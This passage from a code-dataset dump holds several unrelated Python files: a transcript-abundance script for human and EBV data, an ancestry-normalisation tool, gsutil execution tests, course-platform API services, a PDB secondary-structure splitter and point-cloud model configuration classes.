drop genomic transcripts from the ebv dataset (b/c it's not pre-filtered)\nebv_df = ebv_df.loc[ebv_df.transcript_novelty != 'Genomic']\nebv_df['ebv'] = 'EBV' # human/ebv designation\n\n# merge transcript df so TPMs can be calculated correctly\nt_df = pd.concat([full_df, ebv_df])\n\n# combine datasets\ncombine_datasets = True\nif combine_datasets:\n t_df['combined'] = t_df[my_datasets].sum(axis=1)\n datasets = ['combined']\n\n# # make sure the concatenation worked\n# print(t_df.loc[t_df['transcript_ID'] == 121].head())\n# print(ebv_df.loc[ebv_df['transcript_ID'] == 121].head())\n# print(full_df.loc[full_df['transcript_ID'] == 121].head())\n\n# get tpms and number of human transcripts for \n# each dataset and for full/ebv\nfor d in datasets:\n\n # raw TPM\n tpm, t_df = get_tpm(t_df, d)\n\n # log2TPM\n log, t_df = get_log_tpm(t_df, d, 0)\n\n # sanity check - sum of all TPMs for each sample\n print('TPM total for {}: {}'.format(d, str(t_df[tpm].sum())))\n\n human_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'Human')]\n ebv_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'EBV')]\n n_human_transcripts = len(human_df.index)\n n_ebv_transcripts = len(ebv_df.index)\n print('Number of human transcripts in {}: {}'.format(d, str(n_human_transcripts)))\n print('Number of EBV transcripts in {}: {}'.format(d, str(n_ebv_transcripts)))\n\n # add columns for number of dataset human/ebv transcripts\n n_transcripts_col = 'n_'+d\n t_df[n_transcripts_col] = t_df.apply(lambda x:\\\n n_human_transcripts if x['ebv'] == 'Human' else n_ebv_transcripts, axis=1)\n\n # add heights geom_text locations for dataset/human/ebv transcripts\n human_height = t_df.loc[t_df.ebv == 'Human'][log].max()+1\n ebv_height = t_df.loc[t_df.ebv == 'EBV'][log].max()+1\n height_col = d+'_height'\n t_df[height_col] = t_df.apply(lambda x:\\\n human_height if x.ebv == 'Human' else ebv_height, axis=1)\n\n # print(human_height)\n # print(ebv_height)\n\n# print(t_df.head())\n# print(t_df.tail())\n\n# write gene and transcript tables to a csv\nt_df['dot_size'] = t_df.apply(lambda x: 1 if x['ebv'] == 'EBV' else 0.6, axis=1)\nt_df['alpha'] = t_df.apply(lambda x: 0.5 if x['ebv'] == 'EBV' else 0.2, axis=1)\n\n\n# bname = get_basename(ebv_ab)\n# odir = format_odir(os.path.dirname(ebv_ab))\n# odir = make_dated_folder(odir,bname)\nto = oprefix+'_ebv_human_transcript_abundance.csv'\nt_df.to_csv(to, sep=',', index=False)\n\n## get transcript tpms without filtering for bioreps to use for gene tpms\n# read in the unfiltered datasets\nfull_df = pd.read_csv(full_unf_ab, sep='\\t')\nebv_df = pd.read_csv(ebv_unf_ab, sep='\\t')\n\n# reformat human table\n# dc_datasets = ['D4', 'D5', 'D10', 'D11']\ndatasets = my_datasets\n# full_df.drop(dc_datasets, inplace=True, axis=1) # drop datasets we don't want\nfull_df = full_df.loc[full_df['transcript_ID'].isin(human_tids)] # drop ebv transcripts\nfull_df['ebv'] = 'Human' # give human/ebv designation\nfull_df = full_df.loc[full_df.transcript_novelty != 'Genomic']\n\n# drop genomic transcripts from the ebv dataset (b/c it's not pre-filtered)\nebv_df = ebv_df.loc[ebv_df.transcript_novelty != 'Genomic']\nebv_df['ebv'] = 'EBV' # human/ebv designation\n\n# merge transcript df so TPMs can be calculated correctly\nt_df = pd.concat([full_df, ebv_df])\n\n# combine datasets\ncombine_datasets = True\nif combine_datasets:\n t_df['combined'] = t_df[datasets].sum(axis=1)\n datasets = ['combined']\n\n# # make sure the concatenation worked\n# print(t_df.loc[t_df['transcript_ID'] == 121].head())\n# print(ebv_df.loc[ebv_df['transcript_ID'] 
== 121].head())\n# print(full_df.loc[full_df['transcript_ID'] == 121].head())\n\n# get tpms and number of human transcripts for \n# each dataset and for full/ebv\nfor d in datasets:\n\n # raw TPM\n tpm, t_df = get_tpm(t_df, d)\n\n # log2TPM\n log, t_df = get_log_tpm(t_df, d, 0)\n\n # sanity check - sum of all TPMs for each sample\n print('TPM total for {}: {}'.format(d, str(t_df[tpm].sum())))\n\n human_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'Human')]\n ebv_df = t_df.loc[(t_df[d] != 0) & (t_df['ebv'] == 'EBV')]\n n_human_transcripts = len(human_df.index)\n n_ebv_transcripts = len(ebv_df.index)\n print('Number of human transcripts in {}: {}'.format(d, str(n_human_transcripts)))\n print('Number of EBV transcripts in {}: {}'.format(d, str(n_ebv_transcripts)))\n\n # add columns for number of dataset human/ebv transcripts\n n_transcripts_col = 'n_'+d\n t_df[n_transcripts_col] = t_df.apply(lambda x:\\\n n_human_transcripts if x['ebv'] == 'Human' else n_ebv_transcripts, axis=1)\n\n # add heights geom_text locations for dataset/human/ebv transcripts\n human_height = t_df.loc[t_df.ebv == 'Human'][log].max()+1\n ebv_height = t_df.loc[t_df.ebv == 'EBV'][log].max()+1\n height_col = d+'_height'\n t_df[height_col] = t_df.apply(lambda x:\\\n human_height if x.ebv == 'Human' else ebv_height, axis=1)\n\n# get gene tpms\ncols = []\nfor d in datasets:\n cols.append(d)\n cols.append('TPM_'+d)\ng_df = t_df.groupby(['gene_ID', 'gene_novelty', 'ebv'])[cols].sum()\ng_df.reset_index(inplace=True)\n\n# # make sure the groupby worked\n# print(g_df.loc[g_df['gene_ID'] == 16].head())\n# print(t_df.loc[t_df['gene_ID'] == 16].head())\n# print(t_df.loc[t_df['gene_ID'] == 16].head())\n\n# get tpms, heights, and numbers for gene\nfor d in datasets:\n # log2TPM\n log, g_df = get_log_tpm(g_df, d, 0)\n\n human_df = g_df.loc[(g_df[d] != 0) & (g_df['ebv'] == 'Human')]\n ebv_df = g_df.loc[(g_df[d] != 0) & (g_df['ebv'] == 'EBV')]\n n_human_genes = len(human_df.index)\n n_ebv_genes = len(ebv_df.index)\n print('Number of human genes in {}: {}'.format(d, str(n_human_genes)))\n print('Number of EBV genes in {}: {}'.format(d, str(n_ebv_genes)))\n\n # add columns for number of dataset human/ebv genes\n n_genes_col = 'n_'+d\n g_df[n_genes_col] = g_df.apply(lambda x:\\\n n_human_genes if x['ebv'] == 'Human' else n_ebv_genes, axis=1)\n\n # add heights geom_text locations for dataset/human/ebv transcripts\n human_height = g_df.loc[g_df.ebv == 'Human'][log].max()+0.4\n ebv_height = g_df.loc[g_df.ebv == 'EBV'][log].max()+0.4\n height_col = d+'_height'\n g_df[height_col] = g_df.apply(lambda x:\\\n human_height if x.ebv == 'Human' else ebv_height, axis=1)\n\n print(human_height)\n print(ebv_height)\n\nprint(g_df.head())\nprint(g_df.tail())\n\n\n# add different dot sizes for human/ebv\n# t_df['dot_size'] = t_df.apply(lambda x: 1 if x['ebv'] == 'EBV' else 0.6, axis=1)\ng_df['dot_size'] = g_df.apply(lambda x: 1 if x['ebv'] == 'EBV' else 0.6, axis=1)\n\n# t_df['alpha'] = t_df.apply(lambda x: 0.5 if x['ebv'] == 'EBV' else 0.2, axis=1)\ng_df['alpha'] = g_df.apply(lambda x: 0.5 if x['ebv'] == 'EBV' else 0.2, axis=1)\n\n# # rename gene/transcript novelty columns\n# t_df.rename(index=str, columns={\\\n# 'transcript_novelty':'Isoform Type'}, inplace=True)\n# g_df.rename(index=str, columns={\\\n# 'gene_novelty':'Gene Type'}, inplace=True)\n\n\n# write gene table to a csv \n\ngo = oprefix+'_ebv_human_gene_abundance.csv'\ng_df.to_csv(go, sep=',', index=False)\n\n# make graphs\ncmd = 'Rscript plot_ebv_v_human_abundances.R --gene_csv {} 
--transcript_csv {}'\\\n\t ' --datasets {}'.format(go, to, ','.join(datasets))\n# print(cmd)\n\n"} {"ext": "py", "sha": "1a2f27ec83540a6ba9ef180cbaaf5615dbe3c9a6", "content": "#!/usr/bin/env python\n\n\"\"\"\n\n Normalize site observed ancestry by genome-wide average.\n 2*ID_average - ExpectedCopiesOfPop1Ancestry.\n @Author: wavefancy@gmail.com\n\n Usage:\n HapmixEPop1NormalizedByIDAverage.py -a IDaverage\n HapmixEPop1NormalizedByIDAverage.py -h | --help | -v | --version | -f | --format\n\n Notes:\n 1. Read ExpectedCopiesOfPop1Ancestry from stdin, and output to stdout.\n\n Options:\n -a IDaverage Individual average for pop1, one line one person.\n -h --help Show this screen.\n -v --version Show version.\n -f --format Show input/output file format example.\n\n\"\"\"\nimport sys\nfrom docopt import docopt\nfrom signal import signal, SIGPIPE, SIG_DFL\n\ndef ShowFormat():\n '''File format example'''\n print('''\n #ExpectedCopiesOfPop1Ancestry, one column each person.\n ------------------------\n1 1 2 1 2 2\n1 2 2 1 2 2\n\n #id average:\n ------------------------\n0.8\n0.5\n0.1\n\n #output:\n ------------------------\n0.40 0.00 -0.20\n-0.60 0.00 -0.20\n ''');\n\nif __name__ == '__main__':\n args = docopt(__doc__, version='1.0')\n # print(args)\n # sys.exit(0)\n\n if(args['--format']):\n ShowFormat()\n sys.exit(-1)\n\n idav = [] # 2*ID_average\n with open(args['-a'],'r') as ifile:\n for line in ifile:\n line = line.strip()\n if line:\n idav.append(2 * float(line))\n\n checkLen = True\n for line in sys.stdin:\n line = line.strip()\n if line:\n ss = line.split()\n ss = [float(x) for x in ss] #number of pop1 copy for each person.\n\n if checkLen:\n if len(ss) != len(idav):\n sys.stderr.write('Error: numbr of individuals in ID_average file is not the same as that in sys.stdin.\\n')\n sys.exit(-1)\n else:\n checkLen = False\n\n out = [ '%.2f'%(y-x) for x,y in zip(idav, ss)]\n sys.stdout.write('%s\\n'%('\\t'.join(out)))\n\nsys.stdout.flush()\nsys.stdout.close()\nsys.stderr.flush()\nsys.stderr.close()\n"} {"ext": "py", "sha": "1a2f2822f81fe36b28f6dd2487506ab31227c11b", "content": "# -*- coding: utf-8 -*-\n# Copyright 2021 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for execution_util.py.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport subprocess\nfrom unittest import mock\n\nfrom gslib import exception\nfrom gslib.tests import testcase\nfrom gslib.utils import execution_util\n\n\nclass TestExecutionUtil(testcase.GsUtilUnitTestCase):\n \"\"\"Test execution utils.\"\"\"\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsNoOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 0\n mock_command_process.communicate.return_value = (None, None)\n mock_Popen.return_value = mock_command_process\n\n stdout, stderr = execution_util.ExecuteExternalCommand(['fake-command'])\n self.assertIsNone(stdout)\n self.assertIsNone(stderr)\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsStringOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 0\n mock_command_process.communicate.return_value = ('a', 'b')\n mock_Popen.return_value = mock_command_process\n\n stdout, stderr = execution_util.ExecuteExternalCommand(['fake-command'])\n self.assertEqual(stdout, 'a')\n self.assertEqual(stderr, 'b')\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsBytesOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 0\n mock_command_process.communicate.return_value = (b'a', b'b')\n mock_Popen.return_value = mock_command_process\n\n stdout, stderr = execution_util.ExecuteExternalCommand(['fake-command'])\n self.assertEqual(stdout, 'a')\n self.assertEqual(stderr, 'b')\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandReturnsNoOutput(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 1\n mock_command_process.communicate.return_value = (None, b'error')\n mock_Popen.return_value = mock_command_process\n\n with self.assertRaises(exception.ExternalBinaryError):\n execution_util.ExecuteExternalCommand(['fake-command'])\n\n mock_Popen.assert_called_once_with(['fake-command'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n @mock.patch.object(subprocess, 'Popen')\n def testExternalCommandRaisesFormattedStderr(self, mock_Popen):\n mock_command_process = mock.Mock()\n mock_command_process.returncode = 1\n mock_command_process.communicate.return_value = (None, b'error.\\n')\n mock_Popen.return_value = mock_command_process\n\n with self.assertRaisesRegexp(exception.ExternalBinaryError, 'error'):\n 
execution_util.ExecuteExternalCommand(['fake-command'])\n"} {"ext": "py", "sha": "1a2f29c011035f3771d9e24758c92c2c15286a7c", "content": "\"\"\"Collection of services.\"\"\"\nfrom typing import Any, Dict, List, Optional\n\nfrom fastapi import HTTPException, status\nfrom tortoise import QuerySet\n\nfrom teached.users.models import Teacher\n\nfrom .models import ( # noqa I202\n Announcement,\n Assignment,\n BookMark,\n Category,\n Course,\n CourseDetailPydantic,\n Enrollment,\n Language,\n Lecture,\n Requirement,\n Review,\n Section,\n)\nfrom .schema import CourseDetail\nfrom .utils import unique_slug\n\n\nasync def create_course(*, data: Dict, teacher: Teacher) -> str:\n \"\"\"Create new course.\n\n Args:\n data: Dict of new user info.\n teacher: Teacher model instance.\n\n Returns:\n Slug of the course\n \"\"\"\n languages = data.pop(\"languages\")\n\n categories = data.pop(\"categories\")\n\n requirements = data.pop(\"requirements\")\n\n course = Course(**data, teacher=teacher)\n\n # TODO: change this to signal\n course.slug = unique_slug(title=data.get(\"title\"))\n\n await course.save()\n\n for language in languages:\n value, created = await Language.get_or_create(name=language.capitalize())\n\n await course.languages.add(value)\n\n for category in categories:\n value, created = await Category.get_or_create(name=category.capitalize())\n\n await course.categories.add(value)\n\n for requirement in requirements:\n await Requirement.create(name=requirement.capitalize(), course=course)\n\n return course.slug\n\n\nasync def get_published_courses(\n *,\n search: Optional[str] = None,\n category: Optional[str] = None,\n language: Optional[str] = None,\n level: Optional[str] = None,\n price: Optional[str] = None,\n discount: Optional[str] = None,\n) -> QuerySet[Course]:\n \"\"\"Return all published courses.\n\n Args:\n search: Search courses by title.\n category: Filter by category.\n language: Filter by language.\n level: Filter by level.\n price: Filter by price.\n discount: Filter by discount.\n\n Returns:\n Query set of course.\n \"\"\"\n courses = Course.filter(is_drift=False, is_active=True)\n\n if search:\n courses = courses.filter(title=search)\n\n if category:\n courses = courses.filter(categories__name=category)\n\n if language:\n courses = courses.filter(languages__name=language)\n\n if level:\n courses = courses.filter(level=level)\n\n if price:\n courses = courses.filter(price=price)\n\n if discount:\n courses = courses.filter(discount=discount)\n\n return courses\n\n\nasync def get_published_course(*, slug: str, user: Any) -> CourseDetail:\n \"\"\"Return a published courses.\n\n Args:\n slug: The slug of course.\n user: Current authenticated user.\n\n Returns:\n Query set of course.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n pydatic_data = await CourseDetailPydantic.from_tortoise_orm(course)\n data = pydatic_data.dict()\n data.update(\n {\n \"is_authenticated\": user is not None,\n \"has_enroll\": False,\n \"is_owner\": False,\n \"enrollments\": await course.enrollments.all().count(),\n \"reviews\": await course.reviews.all().count(),\n }\n )\n\n if user:\n user_student = await user.students.first()\n user_teacher = await user.teachers.first()\n\n if user_student:\n data.update(\n {\n \"has_enroll\": await course.enrollments.filter(\n student=user_student\n ).first()\n is not None\n }\n )\n\n author = await course.teacher\n\n if user_teacher == author:\n data.update({\"is_owner\": True})\n\n # TODO: change it to computed method.\n reviews = 
course.reviews.all()\n try:\n rate = sum(review.rate for review in await reviews) / await reviews.count()\n\n except ZeroDivisionError:\n rate = 0\n\n data.update({\"rate\": rate})\n\n return CourseDetail(**data)\n\n\nasync def enroll_to_published_course(*, slug: str, student: Any) -> Dict[str, str]:\n \"\"\"Enroll new student to a published course.\n\n Args:\n slug: The slug of course.\n student: Student instances.\n\n Returns:\n Dict.\n\n Raises:\n HTTPException: If use has already enrolled.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n\n if await course.enrollments.filter(student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=f\"You already enrolled to {course}\",\n )\n\n if course.price > 0:\n print(\"Payment\")\n # TODO: add the stripe payment\n # stripe()\n\n # TODO: add payment process to the payment model\n # Payment()\n\n await Enrollment.create(course=course, student=student)\n\n return {\n \"detail\": f\"Yea! you have enrolled to {course}, go and enjoy the course now :)\"\n }\n\n\nasync def bookmark_a_published_course(*, slug: str, student: Any) -> Dict[str, str]:\n \"\"\"Bookmark a published course.\n\n Args:\n slug: The slug of course.\n student: Student instances.\n\n Returns:\n Dict.\n\n Raises:\n HTTPException: If use has already bookmarked.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n\n if await course.book_marks.filter(course=course, student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=f\"You already bookmark {course}\",\n )\n\n await BookMark.create(course=course, student=student)\n\n return {\"detail\": f\"{course} has been bookmarked :)\"}\n\n\nasync def get_bookmarks(*, student: Any) -> List[Dict]:\n \"\"\"Get list of bookmark.\n\n Args:\n student: Student instances.\n\n Returns:\n List of bookmarked course.\n \"\"\"\n course_list = []\n for bookmark in await BookMark.filter(student=student):\n course = await bookmark.course\n course_list.append(\n {\"title\": f\"{course.title}\", \"cover\": {course.cover}, \"slug\": course.slug}\n )\n return course_list\n\n\nasync def create_review_for_published_course(\n *, slug: str, data: Dict, student: Any\n) -> Dict[str, str]:\n \"\"\"Create review for a published course.\n\n Args:\n slug: The slug of course.\n data: Dict of data for review creation.\n student: Student instances.\n\n Returns:\n Dict.\n\n Raises:\n HTTPException: If use has has not enroll for the course or\n student review the course already.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n\n if not await course.enrollments.filter(student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"You need to enroll to the course first\",\n )\n\n if await course.reviews.filter(student=student):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"You already review this course\",\n )\n await Review.create(**data, course=course, student=student)\n\n return {\"detail\": \"review has been created.\"}\n\n\nasync def reviews_course_list(*, slug: str) -> List[Dict]:\n \"\"\"Get all reviews.\n\n Args:\n slug: The slug of course.\n\n Returns:\n List of reviews.\n \"\"\"\n course = await Course.get(is_drift=False, is_active=True, slug=slug)\n review_list = []\n\n for review in await course.reviews.all():\n student = await review.student\n user = await student.user\n review_list.append(\n {\n \"review\": f\"{review.review}\",\n \"rate\": 
{review.rate},\n \"user\": {\"username\": user.username},\n }\n )\n\n return review_list\n\n\nasync def create_course_section(*, data: Dict, course: Course,) -> Dict:\n \"\"\"Create course section.\n\n Args:\n data: Dict of data for section creation.\n course: Course instance.\n\n Returns:\n The created section info.\n\n Raises:\n HTTPException: if the same section was created before.\n \"\"\"\n section, created = await Section.get_or_create(**data, course=course)\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This section was been created before\",\n )\n\n section.slug = unique_slug(title=section.title)\n await section.save()\n\n return {\n \"title\": section.title,\n \"objective\": section.objective,\n \"order\": section.order,\n \"slug\": section.slug,\n }\n\n\nasync def create_course_announcement(\n *, data: Dict, course: Course, teacher: Teacher\n) -> Dict:\n \"\"\"Create course announcement.\n\n Args:\n data: Dict of data for section creation.\n course: Course instance.\n teacher: Teacher instance.\n\n Returns:\n The created announcement info.\n\n Raises:\n HTTPException: if the same section was created before.\n \"\"\"\n announcement, created = await Announcement.get_or_create(\n **data, course=course, teacher=teacher\n )\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This announcement was been created before\",\n )\n\n announcement.slug = unique_slug(title=announcement.title)\n await announcement.save()\n\n return {\n \"title\": announcement.title,\n \"description\": announcement.description,\n \"slug\": announcement.slug,\n }\n\n\nasync def create_section_lecture(*, data: Dict, section_slug: str) -> Dict:\n \"\"\"Create section lecture.\n\n Args:\n data: Dict of data for section creation.\n section_slug: The slug of the section.\n\n Returns:\n The created lecture info.\n\n Raises:\n HTTPException: if the same lecture was created before.\n \"\"\"\n section = await Section.get(slug=section_slug)\n\n lecture, created = await Lecture.get_or_create(**data, section=section)\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This lecture was been created before\",\n )\n\n lecture.slug = unique_slug(title=lecture.title)\n await lecture.save()\n\n return {\n \"title\": lecture.title,\n \"text\": lecture.text,\n \"video\": lecture.video,\n \"order\": section.order,\n \"slug\": section.slug,\n }\n\n\nasync def create_section_assignment(*, data: Dict, section_slug: str) -> Dict:\n \"\"\"Create section assignment.\n\n Args:\n data: Dict of data for section creation.\n section_slug: The slug of the section.\n\n Returns:\n The created assignment info.\n\n Raises:\n HTTPException: if the same assignment was created before.\n \"\"\"\n section = await Section.get(slug=section_slug)\n\n assignment, created = await Assignment.get_or_create(**data, section=section)\n\n if not created:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"This assignment was been created before\",\n )\n\n assignment.slug = unique_slug(title=assignment.title)\n await assignment.save()\n\n return {\n \"title\": assignment.title,\n \"text\": assignment.description,\n \"file\": assignment.file,\n \"slug\": section.slug,\n }\n\n\nasync def update_course_settings(*, data: Dict, teacher: Teacher, slug: str) -> Dict:\n \"\"\"Update course settings.\n\n Args:\n data: Dict of data for section creation.\n teacher: Teacher instance.\n slug: Course slug.\n\n 
Returns:\n The updated settings info.\n \"\"\"\n courses = Course.filter(slug=slug, teacher=teacher)\n await courses.update(**data)\n course = await courses.first()\n\n return {\n \"is_drift\": course.is_drift,\n \"price\": course.price,\n \"discount\": course.discount,\n \"is_active\": course.is_active,\n }\n"} {"ext": "py", "sha": "1a2f29cd7414e2ec385d7c2618051ce26c1d5799", "content": "from __future__ import absolute_import, division, print_function\n# LIBTBX_SET_DISPATCHER_NAME phenix.helix_sheet_recs_as_pdb_files\n\nimport sys\nimport iotbx.pdb\nfrom libtbx.utils import Sorry\n\nlegend = \"\"\"phenix.helix_sheet_recs_as_pdb_files:\n Given PDB file with HELIX/SHEET records output PDB files corresponding to\n each individual HELIX/SHEET record.\n\nHow to run:\n phenix.helix_sheet_recs_as_pdb_files model.pdb\n\nFeedback:\n PAfonine@lbl.gov\n phenixbb@phenix-online.org\"\"\"\n\ndef run(args):\n if(len(args)!=1): raise Sorry(\"PDB file must be provided.\")\n pdb_inp = iotbx.pdb.input(file_name = args[0])\n h = pdb_inp.construct_hierarchy()\n asc = h.atom_selection_cache()\n sso = pdb_inp.extract_secondary_structure()\n for rec in sso.sheets+sso.helices:\n file_name = \"_\".join(rec.as_pdb_str().split())\n file_name = file_name[:min(36, len(file_name))]\n file_name += \".pdb\"\n sel_list = rec.as_atom_selections()\n assert type(sel_list) == list\n if(len(sel_list) == 1):\n sel = asc.selection(string=sel_list[0])\n else:\n sel_str=\" or \".join( [\"(%s)\"%s for s in rec.as_atom_selections()] )\n sel = asc.selection(string=sel_str)\n h_selected = h.select(sel)\n h_selected.write_pdb_file(file_name=file_name)\n\nif (__name__ == \"__main__\"):\n run(args=sys.argv[1:])\n"} {"ext": "py", "sha": "1a2f2b9c17438fe42dde44958a29be9489995353", "content": "# Author: Jacek Komorowski\n# Warsaw University of Technology\n\nimport os\nimport configparser\nimport time\nimport numpy as np\n\n\nclass ModelParams:\n def __init__(self, model_params_path):\n config = configparser.ConfigParser()\n config.read(model_params_path)\n params = config['MODEL']\n\n self.model_params_path = model_params_path\n self.model = params.get('model')\n self.output_dim = params.getint('output_dim', 256) # Size of the final descriptor\n\n # Add gating as the last step\n if 'vlad' in self.model.lower():\n self.cluster_size = params.getint('cluster_size', 64) # Size of NetVLAD cluster\n self.gating = params.getboolean('gating', True) # Use gating after the NetVlad\n\n #######################################################################\n # Model dependent\n #######################################################################\n\n if 'MinkFPN' in self.model:\n # Models using MinkowskiEngine\n self.mink_quantization_size = params.getfloat('mink_quantization_size')\n # Size of the local features from backbone network (only for MinkNet based models)\n # For PointNet-based models we always use 1024 intermediary features\n self.feature_size = params.getint('feature_size', 256)\n if 'planes' in params:\n self.planes = [int(e) for e in params['planes'].split(',')]\n else:\n self.planes = [32, 64, 64]\n\n if 'layers' in params:\n self.layers = [int(e) for e in params['layers'].split(',')]\n else:\n self.layers = [1, 1, 1]\n\n self.num_top_down = params.getint('num_top_down', 1)\n self.conv0_kernel_size = params.getint('conv0_kernel_size', 5)\n\n def print(self):\n print('Model parameters:')\n param_dict = vars(self)\n for e in param_dict:\n print('{}: {}'.format(e, param_dict[e]))\n\n print('')\n\n\ndef get_datetime():\n return 
time.strftime(\"%Y%m%d_%H%M\")\n\n\ndef xyz_from_depth(depth_image, depth_intrinsic, depth_scale=1000.):\n # Return X, Y, Z coordinates from a depth map.\n # This mimics OpenCV cv2.rgbd.depthTo3d() function\n fx = depth_intrinsic[0, 0]\n fy = depth_intrinsic[1, 1]\n cx = depth_intrinsic[0, 2]\n cy = depth_intrinsic[1, 2]\n # Construct (y, x) array with pixel coordinates\n y, x = np.meshgrid(range(depth_image.shape[0]), range(depth_image.shape[1]), sparse=False, indexing='ij')\n\n X = (x - cx) * depth_image / (fx * depth_scale)\n Y = (y - cy) * depth_image / (fy * depth_scale)\n xyz = np.stack([X, Y, depth_image / depth_scale], axis=2)\n xyz[depth_image == 0] = np.nan\n return xyz\n\n\nclass MinkLocParams:\n \"\"\"\n Params for training MinkLoc models on Oxford dataset\n \"\"\"\n def __init__(self, params_path, model_params_path):\n \"\"\"\n Configuration files\n :param path: General configuration file\n :param model_params: Model-specific configuration\n \"\"\"\n\n assert os.path.exists(params_path), 'Cannot find configuration file: {}'.format(params_path)\n assert os.path.exists(model_params_path), 'Cannot find model-specific configuration file: {}'.format(model_params_path)\n self.params_path = params_path\n self.model_params_path = model_params_path\n # self.model_params_path = model_params_path\n\n config = configparser.ConfigParser()\n\n config.read(self.params_path)\n params = config['DEFAULT']\n self.num_points = params.getint('num_points', 4096)\n self.dataset_folder = params.get('dataset_folder')\n self.queries_folder = params.get('queries_folder')\n\n\n params = config['TRAIN']\n self.num_workers = params.getint('num_workers', 0)\n self.batch_size = params.getint('batch_size', 128)\n\n # Set batch_expansion_th to turn on dynamic batch sizing\n # When number of non-zero triplets falls below batch_expansion_th, expand batch size\n self.batch_expansion_th = params.getfloat('batch_expansion_th', None)\n if self.batch_expansion_th is not None:\n assert 0. 
< self.batch_expansion_th < 1., 'batch_expansion_th must be between 0 and 1'\n self.batch_size_limit = params.getint('batch_size_limit', 256)\n # Batch size expansion rate\n self.batch_expansion_rate = params.getfloat('batch_expansion_rate', 1.5)\n assert self.batch_expansion_rate > 1., 'batch_expansion_rate must be greater than 1'\n else:\n self.batch_size_limit = self.batch_size\n self.batch_expansion_rate = None\n\n self.lr = params.getfloat('lr', 1e-3)\n\n self.scheduler = params.get('scheduler', 'MultiStepLR')\n if self.scheduler is not None:\n if self.scheduler == 'CosineAnnealingLR':\n self.min_lr = params.getfloat('min_lr')\n elif self.scheduler == 'MultiStepLR':\n scheduler_milestones = params.get('scheduler_milestones')\n self.scheduler_milestones = [int(e) for e in scheduler_milestones.split(',')]\n else:\n raise NotImplementedError('Unsupported LR scheduler: {}'.format(self.scheduler))\n\n self.epochs = params.getint('epochs', 20)\n self.weight_decay = params.getfloat('weight_decay', None)\n self.normalize_embeddings = params.getboolean('normalize_embeddings', True) # Normalize embeddings during training and evaluation\n self.loss = params.get('loss')\n\n if 'Contrastive' in self.loss:\n self.pos_margin = params.getfloat('pos_margin', 0.2)\n self.neg_margin = params.getfloat('neg_margin', 0.65)\n elif 'Triplet' in self.loss:\n self.margin = params.getfloat('margin', 0.4) # Margin used in loss function\n else:\n raise 'Unsupported loss function: {}'.format(self.loss)\n\n self.aug_mode = params.getint('aug_mode', 1) # Augmentation mode (1 is default)\n\n self.train_file = params.get('train_file')\n self.val_file = params.get('val_file', None)\n\n self.eval_database_files = ['kitti_evaluation_database.pickle']\n\n self.eval_query_files = ['kitti_evaluation_query.pickle']\n\n # self.eval_database_files = ['oxford_evaluation_database.pickle', 'business_evaluation_database.pickle',\n # 'residential_evaluation_database.pickle', 'university_evaluation_database.pickle']\n #\n # self.eval_query_files = ['oxford_evaluation_query.pickle', 'business_evaluation_query.pickle',\n # 'residential_evaluation_query.pickle', 'university_evaluation_query.pickle']\n\n assert len(self.eval_database_files) == len(self.eval_query_files)\n\n # Read model parameters\n self.model_params = ModelParams(self.model_params_path)\n\n self._check_params()\n\n def _check_params(self):\n assert os.path.exists(self.dataset_folder), 'Cannot access dataset: {}'.format(self.dataset_folder)\n assert os.path.exists(self.queries_folder), 'Cannot access dataset: {}'.format(self.queries_folder)\n\n def print(self):\n print('Parameters:')\n param_dict = vars(self)\n for e in param_dict:\n if e != 'model_params':\n print('{}: {}'.format(e, param_dict[e]))\n\n self.model_params.print()\n print('')\n\n"} {"ext": "py", "sha": "1a2f2c37335270663f7395928bb8ea6e0ae5090e", "content": "from typing import Any\nfrom pyparsing import Word,nums,CaselessLiteral,ParseException\nfrom subprocess import Popen,PIPE,STDOUT,CREATE_NO_WINDOW\nfrom json import loads\nimport os\nimport errno\n\ndef is_executable()->bool:\n \"\"\"\n Determine if the current script is packaged as an executable\\n\n (EG: If packed into a 